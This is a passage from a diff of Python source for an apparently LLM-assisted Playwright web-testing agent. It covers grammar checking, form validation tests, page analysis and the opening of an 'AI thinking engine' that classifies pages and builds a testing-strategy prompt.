if text and len(text.strip()) > 10: # Only check meaningful text
|
| 700 |
+
|
| 701 |
+
# Check for common grammar errors
|
| 702 |
+
for rule_name, patterns in self.grammar_rules.items():
|
| 703 |
+
for pattern in patterns:
|
| 704 |
+
matches = re.findall(pattern, text, re.IGNORECASE)
|
| 705 |
+
if matches:
|
| 706 |
+
results.append(TestResult(
|
| 707 |
+
test_type=TestType.GRAMMAR,
|
| 708 |
+
test_name=f"Grammar Issue - {rule_name}",
|
| 709 |
+
status="WARNING",
|
| 710 |
+
description=f"Potential grammar issue found: {matches[0]}",
|
| 711 |
+
details={
|
| 712 |
+
"text": text[:100] + "..." if len(text) > 100 else text,
|
| 713 |
+
"rule_type": rule_name,
|
| 714 |
+
"pattern": pattern,
|
| 715 |
+
"matches": matches,
|
| 716 |
+
"element_tag": await element.evaluate("el => el.tagName")
|
| 717 |
+
},
|
| 718 |
+
recommendations=[
|
| 719 |
+
"Review the text for grammar errors",
|
| 720 |
+
"Use a grammar checking tool",
|
| 721 |
+
"Have content reviewed by a native speaker"
|
| 722 |
+
]
|
| 723 |
+
))
|
| 724 |
+
|
| 725 |
+
except Exception as e:
|
| 726 |
+
logger.error(f"Error checking grammatical errors: {e}")
|
| 727 |
+
|
| 728 |
+
return results
|
| 729 |
+
|
| 730 |
+
async def intelligent_form_testing(self, page: Page) -> List[TestResult]:
|
| 731 |
+
"""Perform intelligent form testing with various data types."""
|
| 732 |
+
results = []
|
| 733 |
+
|
| 734 |
+
try:
|
| 735 |
+
# Find all forms on the page
|
| 736 |
+
forms = await page.query_selector_all('form')
|
| 737 |
+
|
| 738 |
+
for form in forms:
|
| 739 |
+
form_results = await self._test_form_intelligently(form, page)
|
| 740 |
+
results.extend(form_results)
|
| 741 |
+
|
| 742 |
+
except Exception as e:
|
| 743 |
+
logger.error(f"Error in intelligent form testing: {e}")
|
| 744 |
+
|
| 745 |
+
return results
|
| 746 |
+
|
| 747 |
+
async def _test_form_intelligently(self, form: Locator, page: Page) -> List[TestResult]:
|
| 748 |
+
"""Test a form intelligently with various data types."""
|
| 749 |
+
results = []
|
| 750 |
+
|
| 751 |
+
try:
|
| 752 |
+
# Get all input fields in the form
|
| 753 |
+
inputs = await form.query_selector_all('input, textarea, select')
|
| 754 |
+
|
| 755 |
+
# Analyze each input field
|
| 756 |
+
for input_field in inputs:
|
| 757 |
+
input_type = await input_field.get_attribute('type') or 'text'
|
| 758 |
+
input_name = await input_field.get_attribute('name') or 'unknown'
|
| 759 |
+
input_id = await input_field.get_attribute('id') or 'unknown'
|
| 760 |
+
|
| 761 |
+
# Determine the field type based on attributes and context
|
| 762 |
+
field_type = self._determine_field_type(input_type, input_name, input_id)
|
| 763 |
+
|
| 764 |
+
# Test with appropriate data
|
| 765 |
+
test_results = await self._test_field_with_data(input_field, field_type, page)
|
| 766 |
+
results.extend(test_results)
|
| 767 |
+
|
| 768 |
+
except Exception as e:
|
| 769 |
+
logger.error(f"Error testing form intelligently: {e}")
|
| 770 |
+
|
| 771 |
+
return results
|
| 772 |
+
|
| 773 |
+
def _determine_field_type(self, input_type: str, input_name: str, input_id: str) -> str:
|
| 774 |
+
"""Determine the field type based on attributes."""
|
| 775 |
+
field_identifier = f"{input_type} {input_name} {input_id}".lower()
|
| 776 |
+
|
| 777 |
+
if 'email' in field_identifier:
|
| 778 |
+
return 'email'
|
| 779 |
+
elif 'password' in field_identifier:
|
| 780 |
+
return 'password'
|
| 781 |
+
elif 'phone' in field_identifier or 'tel' in field_identifier:
|
| 782 |
+
return 'phone'
|
| 783 |
+
elif 'name' in field_identifier and 'first' in field_identifier:
|
| 784 |
+
return 'first_name'
|
| 785 |
+
elif 'name' in field_identifier and 'last' in field_identifier:
|
| 786 |
+
return 'last_name'
|
| 787 |
+
elif 'name' in field_identifier:
|
| 788 |
+
return 'name'
|
| 789 |
+
elif 'url' in field_identifier or 'website' in field_identifier:
|
| 790 |
+
return 'url'
|
| 791 |
+
elif 'date' in field_identifier:
|
| 792 |
+
return 'date'
|
| 793 |
+
elif 'number' in field_identifier or 'age' in field_identifier:
|
| 794 |
+
return 'number'
|
| 795 |
+
elif 'message' in field_identifier or 'comment' in field_identifier:
|
| 796 |
+
return 'message'
|
| 797 |
+
else:
|
| 798 |
+
return 'text'
|
| 799 |
+
|
| 800 |
+
async def _test_field_with_data(self, input_field: Locator, field_type: str, page: Page) -> List[TestResult]:
|
| 801 |
+
"""Test a field with appropriate test data."""
|
| 802 |
+
results = []
|
| 803 |
+
|
| 804 |
+
if field_type in self.form_test_data:
|
| 805 |
+
test_data = self.form_test_data[field_type]
|
| 806 |
+
|
| 807 |
+
# Test with valid data
|
| 808 |
+
for valid_data in test_data['valid']:
|
| 809 |
+
try:
|
| 810 |
+
await input_field.fill(valid_data)
|
| 811 |
+
await page.keyboard.press('Tab') # Trigger validation
|
| 812 |
+
await page.wait_for_timeout(500)
|
| 813 |
+
|
| 814 |
+
# Check for validation errors
|
| 815 |
+
error_element = await page.query_selector('.error, .invalid, [class*="error"], [class*="invalid"]')
|
| 816 |
+
if error_element:
|
| 817 |
+
results.append(TestResult(
|
| 818 |
+
test_type=TestType.FORM_TESTING,
|
| 819 |
+
test_name=f"Form Validation - Valid Data Rejected",
|
| 820 |
+
status="FAILED",
|
| 821 |
+
description=f"Valid {field_type} data rejected: {valid_data}",
|
| 822 |
+
details={
|
| 823 |
+
"field_type": field_type,
|
| 824 |
+
"test_data": valid_data,
|
| 825 |
+
"error_message": await error_element.inner_text()
|
| 826 |
+
},
|
| 827 |
+
recommendations=[
|
| 828 |
+
"Review form validation logic",
|
| 829 |
+
"Ensure valid data is accepted",
|
| 830 |
+
"Test with various valid formats"
|
| 831 |
+
]
|
| 832 |
+
))
|
| 833 |
+
|
| 834 |
+
except Exception as e:
|
| 835 |
+
logger.warning(f"Error testing valid data: {e}")
|
| 836 |
+
|
| 837 |
+
# Test with invalid data
|
| 838 |
+
for invalid_data in test_data['invalid']:
|
| 839 |
+
try:
|
| 840 |
+
await input_field.fill(invalid_data)
|
| 841 |
+
await page.keyboard.press('Tab') # Trigger validation
|
| 842 |
+
await page.wait_for_timeout(500)
|
| 843 |
+
|
| 844 |
+
# Check for validation errors
|
| 845 |
+
error_element = await page.query_selector('.error, .invalid, [class*="error"], [class*="invalid"]')
|
| 846 |
+
if not error_element:
|
| 847 |
+
results.append(TestResult(
|
| 848 |
+
test_type=TestType.FORM_TESTING,
|
| 849 |
+
test_name=f"Form Validation - Invalid Data Accepted",
|
| 850 |
+
status="FAILED",
|
| 851 |
+
description=f"Invalid {field_type} data accepted: {invalid_data}",
|
| 852 |
+
details={
|
| 853 |
+
"field_type": field_type,
|
| 854 |
+
"test_data": invalid_data
|
| 855 |
+
},
|
| 856 |
+
recommendations=[
|
| 857 |
+
"Implement proper input validation",
|
| 858 |
+
"Reject invalid data formats",
|
| 859 |
+
"Show appropriate error messages"
|
| 860 |
+
]
|
| 861 |
+
))
|
| 862 |
+
|
| 863 |
+
except Exception as e:
|
| 864 |
+
logger.warning(f"Error testing invalid data: {e}")
|
| 865 |
+
|
| 866 |
+
# Test with edge cases
|
| 867 |
+
for edge_data in test_data['edge_cases']:
|
| 868 |
+
try:
|
| 869 |
+
await input_field.fill(edge_data)
|
| 870 |
+
await page.keyboard.press('Tab') # Trigger validation
|
| 871 |
+
await page.wait_for_timeout(500)
|
| 872 |
+
|
| 873 |
+
# Check for validation errors
|
| 874 |
+
error_element = await page.query_selector('.error, .invalid, [class*="error"], [class*="invalid"]')
|
| 875 |
+
if error_element:
|
| 876 |
+
results.append(TestResult(
|
| 877 |
+
test_type=TestType.FORM_TESTING,
|
| 878 |
+
test_name=f"Form Validation - Edge Case Rejected",
|
| 879 |
+
status="WARNING",
|
| 880 |
+
description=f"Edge case {field_type} data rejected: {edge_data}",
|
| 881 |
+
details={
|
| 882 |
+
"field_type": field_type,
|
| 883 |
+
"test_data": edge_data,
|
| 884 |
+
"error_message": await error_element.inner_text()
|
| 885 |
+
},
|
| 886 |
+
recommendations=[
|
| 887 |
+
"Consider accepting edge case data",
|
| 888 |
+
"Review validation rules for edge cases",
|
| 889 |
+
"Document expected behavior for edge cases"
|
| 890 |
+
]
|
| 891 |
+
))
|
| 892 |
+
|
| 893 |
+
except Exception as e:
|
| 894 |
+
logger.warning(f"Error testing edge case data: {e}")
|
| 895 |
+
|
| 896 |
+
return results
|
| 897 |
+
|
| 898 |
+
async def ai_thinking_analysis(self, page: Page) -> List[TestResult]:
|
| 899 |
+
"""AI thinking analysis to determine what to test next."""
|
| 900 |
+
results = []
|
| 901 |
+
|
| 902 |
+
try:
|
| 903 |
+
# Analyze page content to determine testing strategy
|
| 904 |
+
page_content = await page.content()
|
| 905 |
+
|
| 906 |
+
# Check for forms
|
| 907 |
+
forms = await page.query_selector_all('form')
|
| 908 |
+
if forms:
|
| 909 |
+
results.append(TestResult(
|
| 910 |
+
test_type=TestType.FUNCTIONALITY,
|
| 911 |
+
test_name="AI Analysis - Forms Detected",
|
| 912 |
+
status="INFO",
|
| 913 |
+
description=f"Found {len(forms)} form(s) on the page",
|
| 914 |
+
details={
|
| 915 |
+
"forms_count": len(forms),
|
| 916 |
+
"recommendation": "Perform comprehensive form testing"
|
| 917 |
+
},
|
| 918 |
+
recommendations=[
|
| 919 |
+
"Test all form fields with valid and invalid data",
|
| 920 |
+
"Check form validation and error handling",
|
| 921 |
+
"Test form submission and success scenarios"
|
| 922 |
+
]
|
| 923 |
+
))
|
| 924 |
+
|
| 925 |
+
# Check for links
|
| 926 |
+
links = await page.query_selector_all('a[href]')
|
| 927 |
+
if links:
|
| 928 |
+
results.append(TestResult(
|
| 929 |
+
test_type=TestType.FUNCTIONALITY,
|
| 930 |
+
test_name="AI Analysis - Links Detected",
|
| 931 |
+
status="INFO",
|
| 932 |
+
description=f"Found {len(links)} link(s) on the page",
|
| 933 |
+
details={
|
| 934 |
+
"links_count": len(links),
|
| 935 |
+
"recommendation": "Perform link testing"
|
| 936 |
+
},
|
| 937 |
+
recommendations=[
|
| 938 |
+
"Check for broken links",
|
| 939 |
+
"Test external link security",
|
| 940 |
+
"Verify link destinations"
|
| 941 |
+
]
|
| 942 |
+
))
|
| 943 |
+
|
| 944 |
+
# Check for input fields
|
| 945 |
+
inputs = await page.query_selector_all('input, textarea, select')
|
| 946 |
+
if inputs:
|
| 947 |
+
results.append(TestResult(
|
| 948 |
+
test_type=TestType.SECURITY,
|
| 949 |
+
test_name="AI Analysis - Input Fields Detected",
|
| 950 |
+
status="INFO",
|
| 951 |
+
description=f"Found {len(inputs)} input field(s) on the page",
|
| 952 |
+
details={
|
| 953 |
+
"inputs_count": len(inputs),
|
| 954 |
+
"recommendation": "Perform security testing"
|
| 955 |
+
},
|
| 956 |
+
recommendations=[
|
| 957 |
+
"Test for SQL injection vulnerabilities",
|
| 958 |
+
"Test for XSS vulnerabilities",
|
| 959 |
+
"Test input validation and sanitization"
|
| 960 |
+
]
|
| 961 |
+
))
|
| 962 |
+
|
| 963 |
+
# Check for JavaScript
|
| 964 |
+
scripts = await page.query_selector_all('script')
|
| 965 |
+
if scripts:
|
| 966 |
+
results.append(TestResult(
|
| 967 |
+
test_type=TestType.SECURITY,
|
| 968 |
+
test_name="AI Analysis - JavaScript Detected",
|
| 969 |
+
status="INFO",
|
| 970 |
+
description=f"Found {len(scripts)} script(s) on the page",
|
| 971 |
+
details={
|
| 972 |
+
"scripts_count": len(scripts),
|
| 973 |
+
"recommendation": "Perform JavaScript security testing"
|
| 974 |
+
},
|
| 975 |
+
recommendations=[
|
| 976 |
+
"Check for client-side vulnerabilities",
|
| 977 |
+
"Test for DOM-based XSS",
|
| 978 |
+
"Verify JavaScript security practices"
|
| 979 |
+
]
|
| 980 |
+
))
|
| 981 |
+
|
| 982 |
+
except Exception as e:
|
| 983 |
+
logger.error(f"Error in AI thinking analysis: {e}")
|
| 984 |
+
|
| 985 |
+
return results
|
| 986 |
+
|
| 987 |
+
async def run_comprehensive_testing(self, page: Page) -> List[TestResult]:
|
| 988 |
+
"""Run comprehensive testing with AI thinking."""
|
| 989 |
+
all_results = []
|
| 990 |
+
|
| 991 |
+
# AI thinking analysis
|
| 992 |
+
ai_results = await self.ai_thinking_analysis(page)
|
| 993 |
+
all_results.extend(ai_results)
|
| 994 |
+
|
| 995 |
+
# Security testing
|
| 996 |
+
security_results = await self.perform_security_testing(page)
|
| 997 |
+
all_results.extend(security_results)
|
| 998 |
+
|
| 999 |
+
# Broken URL checking
|
| 1000 |
+
url_results = await self.check_broken_urls(page)
|
| 1001 |
+
all_results.extend(url_results)
|
| 1002 |
+
|
| 1003 |
+
# Grammar checking
|
| 1004 |
+
grammar_results = await self.check_grammatical_errors(page)
|
| 1005 |
+
all_results.extend(grammar_results)
|
| 1006 |
+
|
| 1007 |
+
# Intelligent form testing
|
| 1008 |
+
form_results = await self.intelligent_form_testing(page)
|
| 1009 |
+
all_results.extend(form_results)
|
| 1010 |
+
|
| 1011 |
+
return all_results
|
| 1012 |
+
|
| 1013 |
+
|
| 1014 |
+
# Global instance
|
| 1015 |
+
advanced_testing_engine = AdvancedTestingEngine()
|
src/utils/ai_thinking_engine.py
ADDED
|
@@ -0,0 +1,437 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - AI Thinking Engine
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Advanced AI-powered decision making and adaptive testing intelligence.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import json
|
| 15 |
+
from typing import Dict, List, Optional, Any, Tuple
|
| 16 |
+
from dataclasses import dataclass
|
| 17 |
+
from datetime import datetime
|
| 18 |
+
import random
|
| 19 |
+
|
| 20 |
+
from playwright.async_api import Page, Locator
|
| 21 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 22 |
+
from langchain_core.messages import HumanMessage, SystemMessage
|
| 23 |
+
|
| 24 |
+
logger = logging.getLogger(__name__)
|
| 25 |
+
|
| 26 |
+
@dataclass
|
| 27 |
+
class ThinkingStep:
|
| 28 |
+
"""Represents a step in the AI thinking process."""
|
| 29 |
+
step_number: int
|
| 30 |
+
thought: str
|
| 31 |
+
action: str
|
| 32 |
+
reasoning: str
|
| 33 |
+
confidence: float
|
| 34 |
+
timestamp: datetime
|
| 35 |
+
|
| 36 |
+
@dataclass
|
| 37 |
+
class TestStrategy:
|
| 38 |
+
"""Represents a testing strategy determined by AI."""
|
| 39 |
+
approach: str
|
| 40 |
+
priority_order: List[str]
|
| 41 |
+
focus_areas: List[str]
|
| 42 |
+
risk_assessment: Dict[str, float]
|
| 43 |
+
estimated_duration: int # minutes
|
| 44 |
+
reasoning: str
|
| 45 |
+
|
| 46 |
+
class AIThinkingEngine:
|
| 47 |
+
"""Advanced AI thinking engine for intelligent testing decisions."""
|
| 48 |
+
|
| 49 |
+
def __init__(self, llm: BaseChatModel, page: Page):
|
| 50 |
+
self.llm = llm
|
| 51 |
+
self.page = page
|
| 52 |
+
self.thinking_history: List[ThinkingStep] = []
|
| 53 |
+
self.context_memory: Dict[str, Any] = {}
|
| 54 |
+
self.learning_patterns: Dict[str, List[Any]] = {}
|
| 55 |
+
|
| 56 |
+
async def analyze_page_intelligence(self) -> Dict[str, Any]:
|
| 57 |
+
"""Perform intelligent analysis of the current page."""
|
| 58 |
+
logger.info("🧠 Starting intelligent page analysis...")
|
| 59 |
+
|
| 60 |
+
analysis = {
|
| 61 |
+
"page_type": await self._determine_page_type(),
|
| 62 |
+
"form_complexity": await self._assess_form_complexity(),
|
| 63 |
+
"security_indicators": await self._detect_security_indicators(),
|
| 64 |
+
"user_flow_analysis": await self._analyze_user_flow(),
|
| 65 |
+
"potential_issues": await self._identify_potential_issues(),
|
| 66 |
+
"testing_opportunities": await self._identify_testing_opportunities()
|
| 67 |
+
}
|
| 68 |
+
|
| 69 |
+
logger.info(f"✅ Page analysis complete: {analysis['page_type']} page with {analysis['form_complexity']} complexity")
|
| 70 |
+
return analysis
|
| 71 |
+
|
| 72 |
+
async def _determine_page_type(self) -> str:
|
| 73 |
+
"""Determine the type of page (login, registration, checkout, etc.)."""
|
| 74 |
+
try:
|
| 75 |
+
page_content = await self.page.content()
|
| 76 |
+
page_text = page_content.lower()
|
| 77 |
+
|
| 78 |
+
# Check for specific page indicators
|
| 79 |
+
if any(keyword in page_text for keyword in ["login", "sign in", "log in", "authenticate"]):
|
| 80 |
+
return "login"
|
| 81 |
+
elif any(keyword in page_text for keyword in ["register", "sign up", "create account", "join"]):
|
| 82 |
+
return "registration"
|
| 83 |
+
elif any(keyword in page_text for keyword in ["checkout", "payment", "billing", "purchase"]):
|
| 84 |
+
return "checkout"
|
| 85 |
+
elif any(keyword in page_text for keyword in ["contact", "message", "inquiry", "support"]):
|
| 86 |
+
return "contact"
|
| 87 |
+
elif any(keyword in page_text for keyword in ["search", "find", "look for"]):
|
| 88 |
+
return "search"
|
| 89 |
+
elif any(keyword in page_text for keyword in ["profile", "account", "settings", "preferences"]):
|
| 90 |
+
return "profile"
|
| 91 |
+
else:
|
| 92 |
+
return "general"
|
| 93 |
+
|
| 94 |
+
except Exception as e:
|
| 95 |
+
logger.error(f"Error determining page type: {e}")
|
| 96 |
+
return "unknown"
|
| 97 |
+
|
| 98 |
+
async def _assess_form_complexity(self) -> str:
|
| 99 |
+
"""Assess the complexity of forms on the page."""
|
| 100 |
+
try:
|
| 101 |
+
form_count = await self.page.locator("form").count()
|
| 102 |
+
input_count = await self.page.locator("input").count()
|
| 103 |
+
textarea_count = await self.page.locator("textarea").count()
|
| 104 |
+
select_count = await self.page.locator("select").count()
|
| 105 |
+
|
| 106 |
+
total_fields = input_count + textarea_count + select_count
|
| 107 |
+
|
| 108 |
+
if total_fields == 0:
|
| 109 |
+
return "none"
|
| 110 |
+
elif total_fields <= 3:
|
| 111 |
+
return "simple"
|
| 112 |
+
elif total_fields <= 7:
|
| 113 |
+
return "moderate"
|
| 114 |
+
elif total_fields <= 15:
|
| 115 |
+
return "complex"
|
| 116 |
+
else:
|
| 117 |
+
return "very_complex"
|
| 118 |
+
|
| 119 |
+
except Exception as e:
|
| 120 |
+
logger.error(f"Error assessing form complexity: {e}")
|
| 121 |
+
return "unknown"
|
| 122 |
+
|
| 123 |
+
async def _detect_security_indicators(self) -> List[str]:
|
| 124 |
+
"""Detect security-related indicators on the page."""
|
| 125 |
+
security_indicators = []
|
| 126 |
+
|
| 127 |
+
try:
|
| 128 |
+
page_content = await self.page.content()
|
| 129 |
+
|
| 130 |
+
# Check for security-related attributes
|
| 131 |
+
if 'data-security' in page_content:
|
| 132 |
+
security_indicators.append("custom_security_attributes")
|
| 133 |
+
|
| 134 |
+
if 'csrf' in page_content.lower():
|
| 135 |
+
security_indicators.append("csrf_protection")
|
| 136 |
+
|
| 137 |
+
if 'captcha' in page_content.lower():
|
| 138 |
+
security_indicators.append("captcha_protection")
|
| 139 |
+
|
| 140 |
+
if 'recaptcha' in page_content.lower():
|
| 141 |
+
security_indicators.append("recaptcha_protection")
|
| 142 |
+
|
| 143 |
+
# Check for HTTPS
|
| 144 |
+
if self.page.url.startswith('https://'):
|
| 145 |
+
security_indicators.append("https_enabled")
|
| 146 |
+
|
| 147 |
+
# Check for security headers (would need to check response headers)
|
| 148 |
+
security_indicators.append("basic_web_security")
|
| 149 |
+
|
| 150 |
+
except Exception as e:
|
| 151 |
+
logger.error(f"Error detecting security indicators: {e}")
|
| 152 |
+
|
| 153 |
+
return security_indicators
|
| 154 |
+
|
| 155 |
+
async def _analyze_user_flow(self) -> Dict[str, Any]:
|
| 156 |
+
"""Analyze the user flow and navigation patterns."""
|
| 157 |
+
try:
|
| 158 |
+
# Find navigation elements
|
| 159 |
+
nav_links = await self.page.locator("nav a, .navigation a, .menu a").count()
|
| 160 |
+
buttons = await self.page.locator("button").count()
|
| 161 |
+
forms = await self.page.locator("form").count()
|
| 162 |
+
|
| 163 |
+
# Analyze form submission patterns
|
| 164 |
+
submit_buttons = await self.page.locator("input[type='submit'], button[type='submit']").count()
|
| 165 |
+
|
| 166 |
+
return {
|
| 167 |
+
"navigation_links": nav_links,
|
| 168 |
+
"interactive_buttons": buttons,
|
| 169 |
+
"forms": forms,
|
| 170 |
+
"submit_buttons": submit_buttons,
|
| 171 |
+
"user_journey_complexity": "high" if nav_links > 10 or forms > 3 else "medium" if nav_links > 5 or forms > 1 else "low"
|
| 172 |
+
}
|
| 173 |
+
|
| 174 |
+
except Exception as e:
|
| 175 |
+
logger.error(f"Error analyzing user flow: {e}")
|
| 176 |
+
return {"error": str(e)}
|
| 177 |
+
|
| 178 |
+
async def _identify_potential_issues(self) -> List[str]:
|
| 179 |
+
"""Identify potential issues or vulnerabilities."""
|
| 180 |
+
issues = []
|
| 181 |
+
|
| 182 |
+
try:
|
| 183 |
+
page_content = await self.page.content()
|
| 184 |
+
|
| 185 |
+
# Check for common issues
|
| 186 |
+
if 'password' in page_content.lower() and 'type="password"' not in page_content:
|
| 187 |
+
issues.append("password_field_not_secured")
|
| 188 |
+
|
| 189 |
+
if 'email' in page_content.lower() and 'type="email"' not in page_content:
|
| 190 |
+
issues.append("email_field_not_typed")
|
| 191 |
+
|
| 192 |
+
if 'required' not in page_content and 'form' in page_content.lower():
|
| 193 |
+
issues.append("missing_required_validation")
|
| 194 |
+
|
| 195 |
+
if 'onclick' in page_content.lower():
|
| 196 |
+
issues.append("inline_javascript_detected")
|
| 197 |
+
|
| 198 |
+
if 'http://' in page_content and 'https://' in page_content:
|
| 199 |
+
issues.append("mixed_content_detected")
|
| 200 |
+
|
| 201 |
+
except Exception as e:
|
| 202 |
+
logger.error(f"Error identifying potential issues: {e}")
|
| 203 |
+
|
| 204 |
+
return issues
|
| 205 |
+
|
| 206 |
+
async def _identify_testing_opportunities(self) -> List[str]:
|
| 207 |
+
"""Identify specific testing opportunities."""
|
| 208 |
+
opportunities = []
|
| 209 |
+
|
| 210 |
+
try:
|
| 211 |
+
# Check for different types of inputs
|
| 212 |
+
input_types = await self.page.locator("input[type]").all()
|
| 213 |
+
type_set = set()
|
| 214 |
+
|
| 215 |
+
for input_elem in input_types:
|
| 216 |
+
input_type = await input_elem.get_attribute("type")
|
| 217 |
+
if input_type:
|
| 218 |
+
type_set.add(input_type)
|
| 219 |
+
|
| 220 |
+
if "email" in type_set:
|
| 221 |
+
opportunities.append("email_validation_testing")
|
| 222 |
+
|
| 223 |
+
if "password" in type_set:
|
| 224 |
+
opportunities.append("password_security_testing")
|
| 225 |
+
|
| 226 |
+
if "number" in type_set:
|
| 227 |
+
opportunities.append("numeric_input_testing")
|
| 228 |
+
|
| 229 |
+
if "date" in type_set:
|
| 230 |
+
opportunities.append("date_validation_testing")
|
| 231 |
+
|
| 232 |
+
if "file" in type_set:
|
| 233 |
+
opportunities.append("file_upload_testing")
|
| 234 |
+
|
| 235 |
+
# Check for forms
|
| 236 |
+
if await self.page.locator("form").count() > 0:
|
| 237 |
+
opportunities.append("form_submission_testing")
|
| 238 |
+
opportunities.append("cross_field_validation_testing")
|
| 239 |
+
|
| 240 |
+
# Check for dynamic content
|
| 241 |
+
if await self.page.locator("[data-*]").count() > 0:
|
| 242 |
+
opportunities.append("dynamic_content_testing")
|
| 243 |
+
|
| 244 |
+
except Exception as e:
|
| 245 |
+
logger.error(f"Error identifying testing opportunities: {e}")
|
| 246 |
+
|
| 247 |
+
return opportunities
|
| 248 |
+
|
| 249 |
+
async def generate_testing_strategy(self, page_analysis: Dict[str, Any]) -> TestStrategy:
|
| 250 |
+
"""Generate an intelligent testing strategy based on page analysis."""
|
| 251 |
+
logger.info("🎯 Generating intelligent testing strategy...")
|
| 252 |
+
|
| 253 |
+
# Use AI to determine the best testing approach
|
| 254 |
+
strategy_prompt = f"""
|
| 255 |
+
Based on the following page analysis, generate a comprehensive testing strategy:
|
| 256 |
+
|
| 257 |
+
Page Type: {page_analysis.get('page_type', 'unknown')}
|
| 258 |
+
Form Complexity: {page_analysis.get('form_complexity', 'unknown')}
|
| 259 |
+
Security Indicators: {page_analysis.get('security_indicators', [])}
|
| 260 |
+
Potential Issues: {page_analysis.get('potential_issues', [])}
|
| 261 |
+
Testing Opportunities: {page_analysis.get('testing_opportunities', [])}
|
| 262 |
+
